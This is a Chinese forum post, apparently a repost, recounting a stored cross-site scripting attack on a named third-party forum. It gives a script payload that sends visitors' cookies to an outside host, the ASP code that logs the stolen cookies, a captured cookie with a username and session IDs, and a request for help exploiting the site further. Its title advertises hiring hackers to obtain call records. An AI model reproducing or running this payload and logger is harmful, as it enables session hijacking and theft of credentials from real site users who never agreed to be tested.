通话记录先查后付款,黑客查通话记录能在淘宝找黑客办事吗

先看看我的一次跨站测试吧 我以职业欠钱的站点做测试吧: Host:zhiyeqianqian.51web.cn My Test: 先在他的论谈上传两张图, 图一的内容是: document.location=http://linzi.cnbct.org/cooki

先看看我的一次跨站测试吧 
我以职业欠钱的站点做测试吧: 
Host:zhiyeqianqian.51web.cn 
My Test: 
先在他的论谈上传两张图, 
图一的内容是: 
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script> 
得到url为UploadFile/2005-6/200562716565777847.jpg 
图二则是偶的个人照 
UploadFile/2005-6/200562716563048909.jpg 
写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题,所以修改了一下。 
<% 
cookiefile=Server.MapPath("cookie.txt") 
set fs=server.CreateObject("scripting.filesystemobject") 
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0) 
cookiefile.Write(Request.QueryString&"<br>") 
cookiefile.close 
set fs = nothing 
%> 
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg"> 
接下来,点击图一,自动转到图二, 

二、结果分析 
再到我的空间看一下,抓到cookie如下: 
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要吗?嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br> 
分析cookie我们不难看出他的绝对路径是e:\wwwroot\zhiyeqianqian\wwwroot 


三、论谈 
本来,最初的测试我是在测试BCT论谈,成功暴出他的绝对路径,一开始的时候,我还认为可能又是动网出洞洞了,所以又去测试了其它几个站,测试结果是其它的站点并没有暴出路径,今天再次测试“欠我钱”的论谈,却又暴不出来,查了一下代码,和别人的代码一个样,根本没什么差别。 
偶想听听大家的看法,到底是哪里出了问题,能不能深入利用~~~ 

  • 发表于 2020-12-01 11:09
  • 阅读 ( 301 )
  • 分类:互联网

0 条评论

请先 登录 后评论
leexs
leexs

698 篇文章

你可能感兴趣的文章

相关问题